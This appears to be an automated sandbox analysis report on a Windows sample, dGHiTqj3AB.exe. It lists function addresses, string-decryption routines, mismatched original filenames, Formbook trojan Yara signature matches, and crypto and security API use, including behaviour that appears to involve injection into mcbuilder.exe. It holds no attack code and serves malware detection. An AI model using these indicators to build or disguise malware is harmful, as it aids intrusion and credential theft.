Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018F68B8	3_2_018F68B8
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0193E8F0	3_2_0193E8F0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0191A840	3_2_0191A840
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01912840	3_2_01912840
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C6BD7	3_2_019C6BD7
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CAB40	3_2_019CAB40
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0190EA80	3_2_0190EA80
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01928DBF	3_2_01928DBF
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0190ADE0	3_2_0190ADE0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019ACD1F	3_2_019ACD1F
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0191AD00	3_2_0191AD00
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B0CB5	3_2_019B0CB5
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01900CF2	3_2_01900CF2
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01910C00	3_2_01910C00
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0198EFA0	3_2_0198EFA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01902FC8	3_2_01902FC8
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01930F30	3_2_01930F30
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B2F30	3_2_019B2F30
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01952F28	3_2_01952F28
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01984F40	3_2_01984F40
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01922E90	3_2_01922E90
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CCE93	3_2_019CCE93
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CEEDB	3_2_019CEEDB
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CEE26	3_2_019CEE26
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01910E59	3_2_01910E59
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0191B1B0	3_2_0191B1B0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019DB16B	3_2_019DB16B
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0194516C	3_2_0194516C
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018FF172	3_2_018FF172
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019170C0	3_2_019170C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019BF0CC	3_2_019BF0CC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C70E9	3_2_019C70E9
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CF0E0	3_2_019CF0E0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0195739A	3_2_0195739A
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C132D	3_2_019C132D
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018FD34C	3_2_018FD34C
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019152A0	3_2_019152A0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192B2C0	3_2_0192B2C0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192D2F0	3_2_0192D2F0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B12ED	3_2_019B12ED
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019AD5B0	3_2_019AD5B0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019D95C3	3_2_019D95C3
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C7571	3_2_019C7571
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CF43F	3_2_019CF43F
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01901460	3_2_01901460
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CF7B0	3_2_019CF7B0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C16CC	3_2_019C16CC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01955630	3_2_01955630
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019A5910	3_2_019A5910
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01919950	3_2_01919950
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192B950	3_2_0192B950
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019138E0	3_2_019138E0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0197D800	3_2_0197D800
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192FB80	3_2_0192FB80
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01985BF0	3_2_01985BF0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0194DBF9	3_2_0194DBF9
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CFB76	3_2_019CFB76
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01955AA0	3_2_01955AA0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019ADAAC	3_2_019ADAAC
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019B1AA3	3_2_019B1AA3
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019BDAC6	3_2_019BDAC6
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CFA49	3_2_019CFA49
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C7A46	3_2_019C7A46
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01983A6C	3_2_01983A6C
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_0192FDC0	3_2_0192FDC0
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C1D5A	3_2_019C1D5A
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01913D40	3_2_01913D40
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019C7D73	3_2_019C7D73
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CFCF2	3_2_019CFCF2
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01989C32	3_2_01989C32
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01911F92	3_2_01911F92
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CFFB1	3_2_019CFFB1
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018D3FD5	3_2_018D3FD5
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_018D3FD2	3_2_018D3FD2
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_019CFF09	3_2_019CFF09
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: 3_2_01919EB0	3_2_01919EB0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039603E6	8_2_039603E6
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038AE3F0	8_2_038AE3F0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395A352	8_2_0395A352
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039202C0	8_2_039202C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03940274	8_2_03940274
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039541A2	8_2_039541A2
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039601AA	8_2_039601AA
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039581CC	8_2_039581CC
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03890100	8_2_03890100
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0393A118	8_2_0393A118
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03928158	8_2_03928158
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03932000	8_2_03932000
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0389C7C0	8_2_0389C7C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038C4750	8_2_038C4750
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A0770	8_2_038A0770
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BC6E0	8_2_038BC6E0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03960591	8_2_03960591
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A0535	8_2_038A0535
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0394E4F6	8_2_0394E4F6
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03944420	8_2_03944420
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03952446	8_2_03952446
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03956BD7	8_2_03956BD7
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395AB40	8_2_0395AB40
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0389EA80	8_2_0389EA80
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A29A0	8_2_038A29A0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0396A9A6	8_2_0396A9A6
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038B6962	8_2_038B6962
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038868B8	8_2_038868B8
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038CE8F0	8_2_038CE8F0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A2840	8_2_038A2840
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038AA840	8_2_038AA840
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0391EFA0	8_2_0391EFA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03892FC8	8_2_03892FC8
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03942F30	8_2_03942F30
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038E2F28	8_2_038E2F28
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038C0F30	8_2_038C0F30
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03914F40	8_2_03914F40
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395CE93	8_2_0395CE93
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038B2E90	8_2_038B2E90
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395EEDB	8_2_0395EEDB
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395EE26	8_2_0395EE26
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A0E59	8_2_038A0E59
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038B8DBF	8_2_038B8DBF
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0389ADE0	8_2_0389ADE0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038AAD00	8_2_038AAD00
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0393CD1F	8_2_0393CD1F
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03940CB5	8_2_03940CB5
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03890CF2	8_2_03890CF2
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A0C00	8_2_038A0C00
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038E739A	8_2_038E739A
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395132D	8_2_0395132D
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0388D34C	8_2_0388D34C
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A52A0	8_2_038A52A0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BB2C0	8_2_038BB2C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039412ED	8_2_039412ED
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BD2F0	8_2_038BD2F0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038AB1B0	8_2_038AB1B0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038D516C	8_2_038D516C
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0388F172	8_2_0388F172
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0396B16B	8_2_0396B16B
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A70C0	8_2_038A70C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0394F0CC	8_2_0394F0CC
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395F0E0	8_2_0395F0E0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039570E9	8_2_039570E9
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395F7B0	8_2_0395F7B0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039516CC	8_2_039516CC
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038E5630	8_2_038E5630
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0393D5B0	8_2_0393D5B0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_039695C3	8_2_039695C3
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03957571	8_2_03957571
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395F43F	8_2_0395F43F
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03891460	8_2_03891460
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BFB80	8_2_038BFB80
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03915BF0	8_2_03915BF0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038DDBF9	8_2_038DDBF9
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395FB76	8_2_0395FB76
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038E5AA0	8_2_038E5AA0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03941AA3	8_2_03941AA3
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0393DAAC	8_2_0393DAAC
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0394DAC6	8_2_0394DAC6
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03957A46	8_2_03957A46
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395FA49	8_2_0395FA49
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03913A6C	8_2_03913A6C
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03935910	8_2_03935910
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A9950	8_2_038A9950
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BB950	8_2_038BB950
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A38E0	8_2_038A38E0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0390D800	8_2_0390D800
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A1F92	8_2_038A1F92
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395FFB1	8_2_0395FFB1
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03863FD5	8_2_03863FD5
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03863FD2	8_2_03863FD2
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395FF09	8_2_0395FF09
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A9EB0	8_2_038A9EB0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038BFDC0	8_2_038BFDC0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_038A3D40	8_2_038A3D40
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03951D5A	8_2_03951D5A
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03957D73	8_2_03957D73
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0395FCF2	8_2_0395FCF2
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03919C32	8_2_03919C32
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030A1B70	8_2_030A1B70
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0309CA68	8_2_0309CA68
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0309CA70	8_2_0309CA70
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0309AD10	8_2_0309AD10
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_0309CC90	8_2_0309CC90
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030BB2C0	8_2_030BB2C0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030A37EB	8_2_030A37EB
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_030A37F0	8_2_030A37F0
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03BBE354	8_2_03BBE354
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03BBE473	8_2_03BBE473
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03BBE80C	8_2_03BBE80C
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: 8_2_03BBD878	8_2_03BBD878

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: String function: 018FB970 appears 262 times
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: String function: 01945130 appears 58 times
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: String function: 0198F290 appears 103 times
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: String function: 0197EA12 appears 86 times
Source: C:\Users\user\Desktop\dGHiTqj3AB.exe	Code function: String function: 01957E54 appears 107 times
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: String function: 0390EA12 appears 86 times
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: String function: 0391F290 appears 103 times
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: String function: 038D5130 appears 58 times
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: String function: 0388B970 appears 262 times
Source: C:\Windows\SysWOW64\mcbuilder.exe	Code function: String function: 038E7E54 appears 107 times

Sample file is different than original file name gathered from version info

Source: dGHiTqj3AB.exe, 00000000.00000002.1754732124.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000000.00000002.1758679977.00000000075A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000000.00000000.1637708265.0000000000912000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000000.00000002.1754233413.000000000107E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000000.00000002.1757860800.00000000072B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCAA.dll4 vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.0000000001478000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000003.00000002.2264388957.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemcbuilder.exej% vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe, 00000003.00000002.2264746671.00000000019FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs dGHiTqj3AB.exe
Source: dGHiTqj3AB.exe	Binary or memory string: OriginalFilenameamWV.exe8 vs dGHiTqj3AB.exe

Uses 32bit PE files

Source: dGHiTqj3AB.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 3.2.dGHiTqj3AB.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.dGHiTqj3AB.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2263776743.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3492992987.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2264611220.0000000001770000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000009.00000002.3492695958.0000000000B00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3492771051.0000000003450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3492876557.0000000002DD0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2266277321.0000000002810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: dGHiTqj3AB.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dGHiTqj3AB.exe.2cf513c.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.dGHiTqj3AB.exe.72b0000.1.raw.unpack, VU5FiiciHrPuThVwBQ.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs	Security API names: _0020.SetAccessControl
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, zDIByBvZeeoTUlBtuI.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.dGHiTqj3AB.exe.75a0000.3.raw.unpack, hNFj00Hv45CTOkfqEI.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

